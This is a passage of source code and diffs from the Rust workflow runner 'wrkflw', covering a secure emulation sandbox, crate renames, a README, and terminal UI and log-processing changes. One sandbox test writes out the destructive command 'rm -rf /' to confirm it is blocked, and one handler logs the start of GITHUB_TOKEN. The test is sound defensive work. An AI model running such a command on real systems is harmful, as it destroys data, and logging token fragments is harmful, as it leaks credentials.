name if name.starts_with("actions/setup-node") => {
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
}
name if name.starts_with("actions/setup-python") => {
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
}
name if name.starts_with("actions/setup-java") => {
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
check_command_available_secure("java", "Java", "https://adoptium.net/");
}
name if name.starts_with("actions/cache") => {
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
}
// Rust-specific actions
name if name.starts_with("actions-rs/cargo") => {
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
}
name if name.starts_with("actions-rs/toolchain") => {
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
}
name if name.starts_with("actions-rs/fmt") => {
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
}
// Potentially dangerous actions that we warn about
name if name.contains("docker") || name.contains("container") => {
wrkflw_logging::warning(&format!(
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
Use Docker or Podman mode for container actions.",
action_name
));
}
name if name.contains("ssh") || name.contains("deploy") => {
wrkflw_logging::warning(&format!(
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
Use Docker or Podman mode for deployment actions.",
action_name
));
}
// Unknown actions
_ => {
wrkflw_logging::warning(&format!(
"🟡 Unknown action '{}' in secure emulation mode. \
Some functionality may be limited or unavailable.",
action_name
));
}
}
Ok(())
}
/// Check if a command is available, with security-focused messaging
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
use std::process::Command;
let is_available = Command::new("which")
.arg(command)
.output()
.map(|output| output.status.success())
.unwrap_or(false);
if !is_available {
wrkflw_logging::warning(&format!(
"🔧 {} is required but not found on the system",
name
));
wrkflw_logging::info(&format!(
"To use this action in secure mode, please install {}: {}",
name, install_url
));
wrkflw_logging::info(&format!(
"Alternatively, use Docker or Podman mode for automatic {} installation",
name
));
} else {
// Try to get version information
if let Ok(output) = Command::new(command).arg("--version").output() {
if output.status.success() {
let version = String::from_utf8_lossy(&output.stdout);
wrkflw_logging::info(&format!(
"✅ Using system {} in secure mode: {}",
name,
version.trim()
));
}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sandbox::create_strict_sandbox_config;
use std::path::PathBuf;
#[tokio::test]
async fn test_secure_emulation_blocks_dangerous_commands() {
let config = create_strict_sandbox_config();
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
// Should block dangerous commands
let result = runtime
.run_container(
"alpine:latest",
&["rm", "-rf", "/"],
&[],
&PathBuf::from("."),
&[],
)
.await;
assert!(result.is_err());
let error_msg = result.unwrap_err().to_string();
assert!(error_msg.contains("SECURITY BLOCK"));
}
#[tokio::test]
async fn test_secure_emulation_allows_safe_commands() {
let runtime = SecureEmulationRuntime::new();
// Should allow safe commands
let result = runtime
.run_container(
"alpine:latest",
&["echo", "hello world"],
&[],
&PathBuf::from("."),
&[],
)
.await;
assert!(result.is_ok());
let output = result.unwrap();
assert!(output.stdout.contains("hello world"));
assert_eq!(output.exit_code, 0);
}
}

View File

@@ -1,18 +1,23 @@
[package]
name = "ui"
name = "wrkflw-ui"
version.workspace = true
edition.workspace = true
description = "user interface functionality for wrkflw"
description = "Terminal user interface for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
evaluator = { path = "../evaluator" }
executor = { path = "../executor" }
logging = { path = "../logging" }
utils = { path = "../utils" }
github = { path = "../github" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }
# External dependencies
chrono.workspace = true

23
crates/ui/README.md Normal file
View File

@@ -0,0 +1,23 @@
## wrkflw-ui
Terminal user interface for browsing workflows, running them, and viewing logs.
- Tabs: Workflows, Execution, Logs, Help
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
- Integrates with `wrkflw-executor` and `wrkflw-logging`
### Example
```rust
use std::path::PathBuf;
use wrkflw_executor::RuntimeType;
use wrkflw_ui::run_wrkflw_tui;
# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.

View File

@@ -11,12 +11,12 @@ use crossterm::{
execute,
terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
};
use executor::RuntimeType;
use ratatui::{backend::CrosstermBackend, Terminal};
use std::io::{self, stdout};
use std::path::PathBuf;
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::RuntimeType;
pub use state::App;
@@ -50,7 +50,7 @@ pub async fn run_wrkflw_tui(
if app.validation_mode {
app.logs.push("Starting in validation mode".to_string());
logging::info("Starting in validation mode");
wrkflw_logging::info("Starting in validation mode");
}
// Load workflows
@@ -108,13 +108,13 @@ pub async fn run_wrkflw_tui(
Ok(_) => Ok(()),
Err(e) => {
// If the TUI fails to initialize or crashes, fall back to CLI mode
logging::error(&format!("Failed to start UI: {}", e));
wrkflw_logging::error(&format!("Failed to start UI: {}", e));
// Only for 'tui' command should we fall back to CLI mode for files
// For other commands, return the error
if let Some(path) = path {
if path.is_file() {
logging::error("Falling back to CLI mode...");
wrkflw_logging::error("Falling back to CLI mode...");
crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
.await
} else if path.is_dir() {
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
if last_tick.elapsed() >= tick_rate {
app.tick();
app.update_running_workflow_progress();
// Check for log processing updates (includes system log change detection)
app.check_log_processing_updates();
// Request log processing if needed
if app.logs_need_update {
app.request_log_processing_update();
}
last_tick = Instant::now();
}
@@ -180,6 +189,25 @@ fn run_tui_event_loop(
continue;
}
// Handle help overlay scrolling
if app.show_help {
match key.code {
KeyCode::Up | KeyCode::Char('k') => {
app.scroll_help_up();
continue;
}
KeyCode::Down | KeyCode::Char('j') => {
app.scroll_help_down();
continue;
}
KeyCode::Esc | KeyCode::Char('?') => {
app.show_help = false;
continue;
}
_ => {}
}
}
match key.code {
KeyCode::Char('q') => {
// Exit and clean up
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
} else {
app.scroll_logs_up();
}
} else if app.selected_tab == 3 {
app.scroll_help_up();
} else if app.selected_tab == 0 {
app.previous_workflow();
} else if app.selected_tab == 1 {
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
} else {
app.scroll_logs_down();
}
} else if app.selected_tab == 3 {
app.scroll_help_down();
} else if app.selected_tab == 0 {
app.next_workflow();
} else if app.selected_tab == 1 {
@@ -273,7 +305,7 @@ fn run_tui_event_loop(
"[{}] DEBUG: Shift+r detected - this should be uppercase R",
timestamp
));
logging::info(
wrkflw_logging::info(
"Shift+r detected as lowercase - this should be uppercase R",
);
@@ -329,7 +361,7 @@ fn run_tui_event_loop(
"[{}] DEBUG: Reset key 'Shift+R' pressed",
timestamp
));
logging::info("Reset key 'Shift+R' pressed");
wrkflw_logging::info("Reset key 'Shift+R' pressed");
if !app.running {
// Reset workflow status
@@ -367,7 +399,7 @@ fn run_tui_event_loop(
"Workflow '{}' is already running",
workflow.name
));
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Workflow '{}' is already running",
workflow.name
));
@@ -408,7 +440,7 @@ fn run_tui_event_loop(
));
}
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Cannot trigger workflow in {} state",
status_text
));
@@ -416,20 +448,22 @@ fn run_tui_event_loop(
}
} else {
app.logs.push("No workflow selected to trigger".to_string());
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
} else if app.running {
app.logs.push(
"Cannot trigger workflow while another operation is in progress"
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Cannot trigger workflow while another operation is in progress",
);
} else if app.selected_tab != 0 {
app.logs
.push("Switch to Workflows tab to trigger a workflow".to_string());
logging::warning("Switch to Workflows tab to trigger a workflow");
wrkflw_logging::warning(
"Switch to Workflows tab to trigger a workflow",
);
// For better UX, we could also automatically switch to the Workflows tab here
app.switch_tab(0);
}

View File

@@ -1,14 +1,15 @@
// App state for the UI
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
use crate::models::{
ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
WorkflowStatus,
};
use chrono::Local;
use crossterm::event::KeyCode;
use executor::{JobStatus, RuntimeType, StepStatus};
use ratatui::widgets::{ListState, TableState};
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::{JobStatus, RuntimeType, StepStatus};
/// Application state
pub struct App {
@@ -40,6 +41,15 @@ pub struct App {
pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
pub log_search_matches: Vec<usize>, // Indices of logs that match the search
pub log_search_match_idx: usize, // Current match index for navigation
// Help tab scrolling
pub help_scroll: usize, // Scrolling position for help content
// Background log processing
pub log_processor: LogProcessor,
pub processed_logs: Vec<ProcessedLogEntry>,
pub logs_need_update: bool, // Flag to trigger log processing
pub last_system_logs_count: usize, // Track system log changes
}
impl App {
@@ -69,8 +79,10 @@ impl App {
// Use a very short timeout to prevent blocking the UI
let result = std::thread::scope(|s| {
let handle = s.spawn(|| {
utils::fd::with_stderr_to_null(executor::docker::is_available)
.unwrap_or(false)
wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
)
.unwrap_or(false)
});
// Set a short timeout for the thread
@@ -85,7 +97,7 @@ impl App {
}
// If we reach here, the check took too long
logging::warning(
wrkflw_logging::warning(
"Docker availability check timed out, falling back to emulation mode",
);
false
@@ -94,7 +106,7 @@ impl App {
}) {
Ok(result) => result,
Err(_) => {
logging::warning("Docker availability check failed with panic, falling back to emulation mode");
wrkflw_logging::warning("Docker availability check failed with panic, falling back to emulation mode");
false
}
};
@@ -104,12 +116,12 @@ impl App {
"Docker is not available or unresponsive. Using emulation mode instead."
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Docker is not available or unresponsive. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
logging::info("Docker is available, using Docker runtime");
wrkflw_logging::info("Docker is available, using Docker runtime");
RuntimeType::Docker
}
}
@@ -119,8 +131,10 @@ impl App {
// Use a very short timeout to prevent blocking the UI
let result = std::thread::scope(|s| {
let handle = s.spawn(|| {
utils::fd::with_stderr_to_null(executor::podman::is_available)
.unwrap_or(false)
wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
)
.unwrap_or(false)
});
// Set a short timeout for the thread
@@ -135,7 +149,7 @@ impl App {
}
// If we reach here, the check took too long
logging::warning(
wrkflw_logging::warning(
"Podman availability check timed out, falling back to emulation mode",
);
false
@@ -144,7 +158,7 @@ impl App {
}) {
Ok(result) => result,
Err(_) => {
logging::warning("Podman availability check failed with panic, falling back to emulation mode");
wrkflw_logging::warning("Podman availability check failed with panic, falling back to emulation mode");
false
}
};
@@ -154,16 +168,17 @@ impl App {
"Podman is not available or unresponsive. Using emulation mode instead."
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Podman is not available or unresponsive. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
logging::info("Podman is available, using Podman runtime");
wrkflw_logging::info("Podman is available, using Podman runtime");
RuntimeType::Podman
}
}
RuntimeType::Emulation => RuntimeType::Emulation,
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
};
App {
@@ -195,6 +210,13 @@ impl App {
log_filter_level: Some(LogFilterLevel::All),
log_search_matches: Vec::new(),
log_search_match_idx: 0,
help_scroll: 0,
// Background log processing
log_processor: LogProcessor::new(),
processed_logs: Vec::new(),
logs_need_update: true,
last_system_logs_count: 0,
}
}
@@ -210,7 +232,8 @@ impl App {
pub fn toggle_emulation_mode(&mut self) {
self.runtime_type = match self.runtime_type {
RuntimeType::Docker => RuntimeType::Podman,
RuntimeType::Podman => RuntimeType::Emulation,
RuntimeType::Podman => RuntimeType::SecureEmulation,
RuntimeType::SecureEmulation => RuntimeType::Emulation,
RuntimeType::Emulation => RuntimeType::Docker,
};
self.logs
@@ -227,14 +250,15 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Switched to {} mode", timestamp, mode));
logging::info(&format!("Switched to {} mode", mode));
wrkflw_logging::info(&format!("Switched to {} mode", mode));
}
pub fn runtime_type_name(&self) -> &str {
match self.runtime_type {
RuntimeType::Docker => "Docker",
RuntimeType::Podman => "Podman",
RuntimeType::Emulation => "Emulation",
RuntimeType::SecureEmulation => "Secure Emulation",
RuntimeType::Emulation => "Emulation (Unsafe)",
}
}
@@ -425,10 +449,9 @@ impl App {
if let Some(idx) = self.workflow_list_state.selected() {
if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
self.execution_queue.push(idx);
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs.push(format!(
"[{}] Added '{}' to execution queue. Press 'Enter' to start.",
timestamp, self.workflows[idx].name
self.add_timestamped_log(&format!(
"Added '{}' to execution queue. Press 'Enter' to start.",
self.workflows[idx].name
));
}
}
@@ -445,7 +468,7 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Starting workflow execution...", timestamp));
logging::info("Starting workflow execution...");
wrkflw_logging::info("Starting workflow execution...");
}
}
@@ -453,7 +476,7 @@ impl App {
pub fn process_execution_result(
&mut self,
workflow_idx: usize,
result: Result<(Vec<executor::JobResult>, ()), String>,
result: Result<(Vec<wrkflw_executor::JobResult>, ()), String>,
) {
if workflow_idx >= self.workflows.len() {
let timestamp = Local::now().format("%H:%M:%S").to_string();
@@ -461,7 +484,7 @@ impl App {
"[{}] Error: Invalid workflow index received",
timestamp
));
logging::error("Invalid workflow index received in process_execution_result");
wrkflw_logging::error("Invalid workflow index received in process_execution_result");
return;
}
@@ -490,15 +513,15 @@ impl App {
.push(format!("[{}] Operation completed successfully.", timestamp));
execution_details.progress = 1.0;
// Convert executor::JobResult to our JobExecution struct
// Convert wrkflw_executor::JobResult to our JobExecution struct
execution_details.jobs = jobs
.iter()
.map(|job_result| JobExecution {
name: job_result.name.clone(),
status: match job_result.status {
executor::JobStatus::Success => JobStatus::Success,
executor::JobStatus::Failure => JobStatus::Failure,
executor::JobStatus::Skipped => JobStatus::Skipped,
wrkflw_executor::JobStatus::Success => JobStatus::Success,
wrkflw_executor::JobStatus::Failure => JobStatus::Failure,
wrkflw_executor::JobStatus::Skipped => JobStatus::Skipped,
},
steps: job_result
.steps
@@ -506,9 +529,9 @@ impl App {
.map(|step_result| StepExecution {
name: step_result.name.clone(),
status: match step_result.status {
executor::StepStatus::Success => StepStatus::Success,
executor::StepStatus::Failure => StepStatus::Failure,
executor::StepStatus::Skipped => StepStatus::Skipped,
wrkflw_executor::StepStatus::Success => StepStatus::Success,
wrkflw_executor::StepStatus::Failure => StepStatus::Failure,
wrkflw_executor::StepStatus::Skipped => StepStatus::Skipped,
},
output: step_result.output.clone(),
})
@@ -547,7 +570,7 @@ impl App {
"[{}] Workflow '{}' completed successfully!",
timestamp, workflow.name
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"[{}] Workflow '{}' completed successfully!",
timestamp, workflow.name
));
@@ -559,7 +582,7 @@ impl App {
"[{}] Workflow '{}' failed: {}",
timestamp, workflow.name, e
));
logging::error(&format!(
wrkflw_logging::error(&format!(
"[{}] Workflow '{}' failed: {}",
timestamp, workflow.name, e
));
@@ -585,7 +608,7 @@ impl App {
self.current_execution = Some(next);
self.logs
.push(format!("Executing workflow: {}", self.workflows[next].name));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Executing workflow: {}",
self.workflows[next].name
));
@@ -631,10 +654,11 @@ impl App {
self.log_search_active = false;
self.log_search_query.clear();
self.log_search_matches.clear();
self.mark_logs_for_update();
}
KeyCode::Backspace => {
self.log_search_query.pop();
self.update_log_search_matches();
self.mark_logs_for_update();
}
KeyCode::Enter => {
self.log_search_active = false;
@@ -642,7 +666,7 @@ impl App {
}
KeyCode::Char(c) => {
self.log_search_query.push(c);
self.update_log_search_matches();
self.mark_logs_for_update();
}
_ => {}
}
@@ -654,8 +678,8 @@ impl App {
if !self.log_search_active {
// Don't clear the query, this allows toggling the search UI while keeping the filter
} else {
// When activating search, update matches
self.update_log_search_matches();
// When activating search, trigger update
self.mark_logs_for_update();
}
}
@@ -666,8 +690,8 @@ impl App {
Some(level) => Some(level.next()),
};
// Update search matches when filter changes
self.update_log_search_matches();
// Trigger log processing update when filter changes
self.mark_logs_for_update();
}
// Clear log search and filter
@@ -676,6 +700,7 @@ impl App {
self.log_filter_level = None;
self.log_search_matches.clear();
self.log_search_match_idx = 0;
self.mark_logs_for_update();
}
// Update matches based on current search and filter
@@ -688,7 +713,7 @@ impl App {
for log in &self.logs {
all_logs.push(log.clone());
}
for log in logging::get_logs() {
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
@@ -780,12 +805,24 @@ impl App {
// Scroll logs down
pub fn scroll_logs_down(&mut self) {
// Get total log count including system logs
let total_logs = self.logs.len() + logging::get_logs().len();
let total_logs = self.logs.len() + wrkflw_logging::get_logs().len();
if total_logs > 0 {
self.log_scroll = (self.log_scroll + 1).min(total_logs - 1);
}
}
// Scroll help content up
pub fn scroll_help_up(&mut self) {
self.help_scroll = self.help_scroll.saturating_sub(1);
}
// Scroll help content down
pub fn scroll_help_down(&mut self) {
// The help content has a fixed number of lines, so we set a reasonable max
const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
}
// Update progress for running workflows
pub fn update_running_workflow_progress(&mut self) {
if let Some(idx) = self.current_execution {
@@ -834,7 +871,9 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Error: Invalid workflow selection", timestamp));
logging::error("Invalid workflow selection in trigger_selected_workflow");
wrkflw_logging::error(
"Invalid workflow selection in trigger_selected_workflow",
);
return;
}
@@ -844,7 +883,7 @@ impl App {
"[{}] Triggering workflow: {}",
timestamp, workflow.name
));
logging::info(&format!("Triggering workflow: {}", workflow.name));
wrkflw_logging::info(&format!("Triggering workflow: {}", workflow.name));
// Clone necessary values for the async task
let workflow_name = workflow.name.clone();
@@ -877,19 +916,19 @@ impl App {
// Send the result back to the main thread
if let Err(e) = tx_clone.send((selected_idx, result)) {
logging::error(&format!("Error sending trigger result: {}", e));
wrkflw_logging::error(&format!("Error sending trigger result: {}", e));
}
});
} else {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] No workflow selected to trigger", timestamp));
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
} else {
self.logs
.push("No workflow selected to trigger".to_string());
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
}
@@ -902,7 +941,7 @@ impl App {
"[{}] Debug: No workflow selected for reset",
timestamp
));
logging::warning("No workflow selected for reset");
wrkflw_logging::warning("No workflow selected for reset");
return;
}
@@ -939,7 +978,7 @@ impl App {
"[{}] Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
timestamp, workflow.name, old_status, workflow.status
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
workflow.name, old_status, workflow.status
));
@@ -949,4 +988,82 @@ impl App {
}
}
}
/// Request log processing update from background thread
pub fn request_log_processing_update(&mut self) {
let request = LogProcessingRequest {
search_query: self.log_search_query.clone(),
filter_level: self.log_filter_level.clone(),
app_logs: self.logs.clone(),
app_logs_count: self.logs.len(),
system_logs_count: wrkflw_logging::get_logs().len(),
};
if self.log_processor.request_update(request).is_err() {
// Log processor channel disconnected, recreate it
self.log_processor = LogProcessor::new();
self.logs_need_update = true;
}
}
/// Check for and apply log processing updates
pub fn check_log_processing_updates(&mut self) {
// Check if system logs have changed
let current_system_logs_count = wrkflw_logging::get_logs().len();
if current_system_logs_count != self.last_system_logs_count {
self.last_system_logs_count = current_system_logs_count;
self.mark_logs_for_update();
}
if let Some(response) = self.log_processor.try_get_update() {
self.processed_logs = response.processed_logs;
self.log_search_matches = response.search_matches;
// Update scroll position to first match if we have search results
if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
self.log_search_match_idx = 0;
if let Some(&idx) = self.log_search_matches.first() {
self.log_scroll = idx;
}
}
self.logs_need_update = false;
}
}
/// Trigger log processing when search/filter changes
pub fn mark_logs_for_update(&mut self) {
self.logs_need_update = true;
self.request_log_processing_update();
}
/// Get combined app and system logs for background processing
pub fn get_combined_logs(&self) -> Vec<String> {
let mut all_logs = Vec::new();
// Add app logs
for log in &self.logs {
all_logs.push(log.clone());
}
// Add system logs
for log in wrkflw_logging::get_logs() {
all_logs.push(log.clone());
}
all_logs
}
/// Add a log entry and trigger log processing update
pub fn add_log(&mut self, message: String) {
self.logs.push(message);
self.mark_logs_for_update();
}
/// Add a formatted log entry with timestamp and trigger log processing update
pub fn add_timestamped_log(&mut self, message: &str) {
let timestamp = Local::now().format("%H:%M:%S").to_string();
let formatted_message = format!("[{}] {}", timestamp, message);
self.add_log(formatted_message);
}
}

View File

@@ -2,12 +2,12 @@
use crate::app::App;
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
use chrono::Local;
use evaluator::evaluate_workflow_file;
use executor::{self, JobStatus, RuntimeType, StepStatus};
use std::io;
use std::path::{Path, PathBuf};
use std::sync::mpsc;
use std::thread;
use wrkflw_evaluator::evaluate_workflow_file;
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};
// Validate a workflow or directory containing workflows
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
@@ -20,7 +20,7 @@ pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
let entry = entry?;
let entry_path = entry.path();
if entry_path.is_file() && utils::is_workflow_file(&entry_path) {
if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
workflows.push(entry_path);
}
}
@@ -105,23 +105,24 @@ pub async fn execute_workflow_cli(
// Check container runtime availability if container runtime is selected
let runtime_type = match runtime_type {
RuntimeType::Docker => {
if !executor::docker::is_available() {
if !wrkflw_executor::docker::is_available() {
println!("⚠️ Docker is not available. Using emulation mode instead.");
logging::warning("Docker is not available. Using emulation mode instead.");
wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
RuntimeType::Emulation
} else {
RuntimeType::Docker
}
}
RuntimeType::Podman => {
if !executor::podman::is_available() {
if !wrkflw_executor::podman::is_available() {
println!("⚠️ Podman is not available. Using emulation mode instead.");
logging::warning("Podman is not available. Using emulation mode instead.");
wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
RuntimeType::Emulation
} else {
RuntimeType::Podman
}
}
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
RuntimeType::Emulation => RuntimeType::Emulation,
};
@@ -129,20 +130,20 @@ pub async fn execute_workflow_cli(
println!("Runtime mode: {:?}", runtime_type);
// Log the start of the execution in debug mode with more details
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Starting workflow execution: path={}, runtime={:?}, verbose={}",
path.display(),
runtime_type,
verbose
));
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type,
verbose,
preserve_containers_on_failure: false, // Default for this path
};
match executor::execute_workflow(path, config).await {
match wrkflw_executor::execute_workflow(path, config).await {
Ok(result) => {
println!("\nWorkflow execution results:");
@@ -166,7 +167,7 @@ pub async fn execute_workflow_cli(
println!("-------------------------");
// Log the job details for debug purposes
logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
for step in job.steps.iter() {
match step.status {
@@ -202,7 +203,7 @@ pub async fn execute_workflow_cli(
}
// Show command/run details in debug mode
if logging::get_log_level() <= logging::LogLevel::Debug {
if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
if let Some(cmd_output) = step
.output
.lines()
@@ -242,7 +243,7 @@ pub async fn execute_workflow_cli(
}
// Always log the step details for debug purposes
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Step: {}, Status: {:?}, Output length: {} lines",
step.name,
step.status,
@@ -250,10 +251,10 @@ pub async fn execute_workflow_cli(
));
// In debug mode, log all step output
if logging::get_log_level() == logging::LogLevel::Debug
if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
&& !step.output.trim().is_empty()
{
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Step output for '{}': \n{}",
step.name, step.output
));
@@ -265,7 +266,7 @@ pub async fn execute_workflow_cli(
println!("\n❌ Workflow completed with failures");
// In the case of failure, we'll also inform the user about the debug option
// if they're not already using it
if logging::get_log_level() > logging::LogLevel::Debug {
if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
println!(" Run with --debug for more detailed output");
}
} else {
@@ -276,7 +277,7 @@ pub async fn execute_workflow_cli(
}
Err(e) => {
println!("❌ Failed to execute workflow: {}", e);
logging::error(&format!("Failed to execute workflow: {}", e));
wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
Err(io::Error::other(e))
}
}
@@ -286,7 +287,7 @@ pub async fn execute_workflow_cli(
pub async fn execute_curl_trigger(
workflow_name: &str,
branch: Option<&str>,
) -> Result<(Vec<executor::JobResult>, ()), String> {
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
// Get GitHub token
let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
"GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
@@ -294,13 +295,13 @@ pub async fn execute_curl_trigger(
// Debug log to check if GITHUB_TOKEN is set
match std::env::var("GITHUB_TOKEN") {
Ok(token) => logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
Err(_) => logging::error("GITHUB_TOKEN is not set"),
Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
}
// Get repository information
let repo_info =
github::get_repo_info().map_err(|e| format!("Failed to get repository info: {}", e))?;
let repo_info = wrkflw_github::get_repo_info()
.map_err(|e| format!("Failed to get repository info: {}", e))?;
// Determine branch to use
let branch_ref = branch.unwrap_or(&repo_info.default_branch);
@@ -315,7 +316,7 @@ pub async fn execute_curl_trigger(
workflow_name
};
logging::info(&format!("Using workflow name: {}", workflow_name));
wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));
// Construct JSON payload
let payload = serde_json::json!({
@@ -328,7 +329,7 @@ pub async fn execute_curl_trigger(
repo_info.owner, repo_info.repo, workflow_name
);
logging::info(&format!("Triggering workflow at URL: {}", url));
wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));
// Create a reqwest client
let client = reqwest::Client::new();
@@ -362,12 +363,12 @@ pub async fn execute_curl_trigger(
);
// Create a job result structure
let job_result = executor::JobResult {
let job_result = wrkflw_executor::JobResult {
name: "GitHub Trigger".to_string(),
status: executor::JobStatus::Success,
steps: vec![executor::StepResult {
status: wrkflw_executor::JobStatus::Success,
steps: vec![wrkflw_executor::StepResult {
name: "Remote Trigger".to_string(),
status: executor::StepStatus::Success,
status: wrkflw_executor::StepStatus::Success,
output: success_msg,
}],
logs: "Workflow triggered remotely on GitHub".to_string(),
@@ -391,13 +392,13 @@ pub fn start_next_workflow_execution(
if verbose {
app.logs
.push("Verbose mode: Step outputs will be displayed in full".to_string());
logging::info("Verbose mode: Step outputs will be displayed in full");
wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
} else {
app.logs.push(
"Standard mode: Only step status will be shown (use --verbose for full output)"
.to_string(),
);
logging::info(
wrkflw_logging::info(
"Standard mode: Only step status will be shown (use --verbose for full output)",
);
}
@@ -406,21 +407,24 @@ pub fn start_next_workflow_execution(
let runtime_type = match app.runtime_type {
RuntimeType::Docker => {
// Use safe FD redirection to check Docker availability
let is_docker_available =
match utils::fd::with_stderr_to_null(executor::docker::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
) {
Ok(result) => result,
Err(_) => {
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability.",
);
false
}
};
if !is_docker_available {
app.logs
.push("Docker is not available. Using emulation mode instead.".to_string());
logging::warning("Docker is not available. Using emulation mode instead.");
wrkflw_logging::warning(
"Docker is not available. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
RuntimeType::Docker
@@ -428,26 +432,30 @@ pub fn start_next_workflow_execution(
}
RuntimeType::Podman => {
// Use safe FD redirection to check Podman availability
let is_podman_available =
match utils::fd::with_stderr_to_null(executor::podman::is_available) {
Ok(result) => result,
Err(_) => {
logging::debug(
